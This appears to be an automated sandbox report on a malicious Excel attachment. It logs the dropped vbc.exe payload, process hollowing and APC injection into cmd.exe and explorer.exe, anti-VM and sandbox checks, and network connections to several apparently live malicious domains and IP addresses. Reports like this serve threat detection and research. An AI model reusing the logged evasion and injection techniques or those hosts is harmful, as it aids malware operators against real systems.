            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_008DFDC0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_008DFEA0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_008DFED0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,5_2_008DFFB4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E10D0 NtOpenProcessToken,5_2_008E10D0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0060 NtQuerySection,5_2_008E0060
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E01D4 NtSetValueKey,5_2_008E01D4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E010C NtOpenDirectoryObject,5_2_008E010C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1148 NtOpenThread,5_2_008E1148
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF8CC NtWaitForSingleObject,5_2_008DF8CC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF938 NtWriteFile,5_2_008DF938
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1930 NtSetContextThread,5_2_008E1930
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F00C4 NtCreateFile,LdrInitializeThunk,7_2_021F00C4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F07AC NtCreateMutant,LdrInitializeThunk,7_2_021F07AC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_021EFAE8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFB50 NtCreateKey,LdrInitializeThunk,7_2_021EFB50
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_021EFB68
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_021EFBB8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF900 NtReadFile,LdrInitializeThunk,7_2_021EF900
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF9F0 NtClose,LdrInitializeThunk,7_2_021EF9F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_021EFED0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFFB4 NtCreateSection,LdrInitializeThunk,7_2_021EFFB4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_021EFC60
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFD8C NtDelayExecution,LdrInitializeThunk,7_2_021EFD8C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_021EFDC0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0048 NtProtectVirtualMemory,7_2_021F0048
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0078 NtResumeThread,7_2_021F0078
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0060 NtQuerySection,7_2_021F0060
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F10D0 NtOpenProcessToken,7_2_021F10D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F010C NtOpenDirectoryObject,7_2_021F010C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F1148 NtOpenThread,7_2_021F1148
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F01D4 NtSetValueKey,7_2_021F01D4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFA20 NtQueryInformationFile,7_2_021EFA20
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFA50 NtEnumerateValueKey,7_2_021EFA50
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFAB8 NtQueryValueKey,7_2_021EFAB8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFAD0 NtAllocateVirtualMemory,7_2_021EFAD0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFBE8 NtQueryVirtualMemory,7_2_021EFBE8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF8CC NtWaitForSingleObject,7_2_021EF8CC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EF938 NtWriteFile,7_2_021EF938
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F1930 NtSetContextThread,7_2_021F1930
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFE24 NtWriteVirtualMemory,7_2_021EFE24
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFEA0 NtReadVirtualMemory,7_2_021EFEA0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFF34 NtQueueApcThread,7_2_021EFF34
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFFFC NtCreateProcessEx,7_2_021EFFFC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC30 NtOpenProcess,7_2_021EFC30
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC48 NtSetInformationFile,7_2_021EFC48
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F0C40 NtGetContextThread,7_2_021F0C40
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFC90 NtUnmapViewOfSection,7_2_021EFC90
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021EFD5C NtEnumerateKey,7_2_021EFD5C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021F1D80 NtSuspendThread,7_2_021F1D80
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D85F0 NtCreateFile,7_2_000D85F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D86A0 NtReadFile,7_2_000D86A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D8720 NtClose,7_2_000D8720
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D8642 NtCreateFile,7_2_000D8642
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D869D NtReadFile,7_2_000D869D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D871A NtClose,7_2_000D871A
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: RFQ HCI20220113.xlsxVirustotal: Detection: 33%
            Source: RFQ HCI20220113.xlsxReversingLabs: Detection: 30%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ HCI20220113.xlsxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF028.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@7/18@9/8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
            Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: vbc.exe.2.dr, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: vbc[1].exe.2.dr, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.vbc.exe.11a0000.2.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.2.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.6.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.8.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.1.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.vbc.exe.11a0000.4.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.10.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.3.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.4.unpack, u0005u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A6167 push 3A000004h; retf 0000h4_2_011A616C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A642A push es; retf 4_2_011A6437
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A7296 push FFFFFFA1h; iretd 4_2_011A72A2
            Source: C:\Users\Public\vbc.exeCode function: 4_2_011A6AFF push es; iretd 4_2_011A6B51
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E6295 push edi; ret 4_2_002E6296
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB630 pushfd ; ret 4_2_002EB631
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB69C pushfd ; ret 4_2_002EB69E
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB6E2 pushfd ; ret 4_2_002EB6E3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B842 push eax; ret 5_2_0041B848
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B84B push eax; ret 5_2_0041B8B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004188F2 push ds; ret 5_2_004188F3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8AC push eax; ret 5_2_0041B8B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00416109 push cs; iretd 5_2_0041610A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00415237 pushfd ; iretd 5_2_00415238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7F5 push eax; ret 5_2_0041B848
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A6167 push 3A000004h; retf 0000h5_2_011A616C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A7296 push FFFFFFA1h; iretd 5_2_011A72A2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A6AFF push es; iretd 5_2_011A6B51
            Source: C:\Users\Public\vbc.exeCode function: 5_2_011A642A push es; retf 5_2_011A6437
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FDFA1 push ecx; ret 7_2_021FDFB4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D6109 push cs; iretd 7_2_000D610A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D5237 pushfd ; iretd 7_2_000D5238
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB7F5 push eax; ret 7_2_000DB848
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB84B push eax; ret 7_2_000DB8B2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB842 push eax; ret 7_2_000DB848
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DB8AC push eax; ret 7_2_000DB8B2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000D88F2 push ds; ret 7_2_000D88F3
            Source: initial sampleStatic PE information: section name: .text entropy: 7.74258433139
            Source: initial sampleStatic PE information: section name: .text entropy: 7.74258433139
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 4.2.vbc.exe.2626be0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.2647ca8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2540, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000000C8614 second address: 00000000000C861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000000C89AE second address: 00000000000C89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1828Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2548Thread sleep time: -38872s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 1352Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1612Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2812Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 38872Jump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.502082327.000000000456F000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: vbc.exe, 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
            Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h]5_2_008F26F8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022026F8 mov eax, dword ptr fs:[00000030h]7_2_022026F8
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B50 LdrLoadDll,5_2_00409B50
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.terapiaholisticaemformacao.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.220 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 195.211.74.112 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.ylhwcl.com
            Source: C:\Windows\explorer.exeDomain query: www.integratedheartspsychology.com
            Source: C:\Windows\explorer.exeDomain query: www.circlessalaries.com
            Source: C:\Windows\explorer.exeNetwork Connect: 221.121.143.148 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.topeasyip.company
            Source: C:\Windows\explorer.exeNetwork Connect: 216.172.160.188 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 23.80.120.93 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.ecommerceoptimise.com
            Source: C:\Windows\explorer.exeNetwork Connect: 122.10.28.11 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.bjbwx114.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.98.251 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.orphe.biz
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 49D90000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
